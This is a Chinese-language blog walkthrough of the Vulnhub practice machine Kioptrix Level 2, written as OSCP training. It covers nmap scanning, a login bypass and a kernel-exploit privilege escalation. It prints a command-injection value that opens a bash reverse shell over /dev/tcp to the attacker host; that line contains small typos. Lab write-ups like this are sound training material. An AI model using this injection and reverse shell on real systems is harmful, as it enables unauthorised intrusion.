OSCP靶机训练Kioptrix Level 2
Vulnhub——Kioptrix Level 2
前期准备:
- kali攻击机:10.0.0.4
- 靶机:10.0.0.11
- 网络适配器全部设置为NAT模式
- 靶机需要去配置文件中将所有Bridge改为nat
渗透过程
第一步:主机存活探测
arp-scan -l
第二步:端口扫描
nmap --min-rate 10000 -p- 10.0.0.11
第三步:基本信息扫描
nmap -sT -sC -sV -O -p22,80,111,443,631,936,3306 10.0.0.11
第四步:web渗透
- 访问web站点
- 发现需要登录,尝试弱口令以及万能密码进行登录成功
- 很典型的一个漏洞点,在kali中进行监听
- 在网页中输入ping 10.0.04; bash -i >& /dev/tcp/10.0.0.4/1234 0>1&
- 获得普通用户权限
-
然后就是进行提权,这里我用的内核提权
-
根据第三步可以知道靶机的系统版本
- 在kali中搜索该版本系统存在的exp
- 在kali中建立web服务,然后在靶机中下载exp
- ····不允许····意料之中了,应该需要找一个允许的文件夹,一般这种情况大多数都会选择/tmp文件夹,去尝试一下
- 成功了,编译运行一下
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】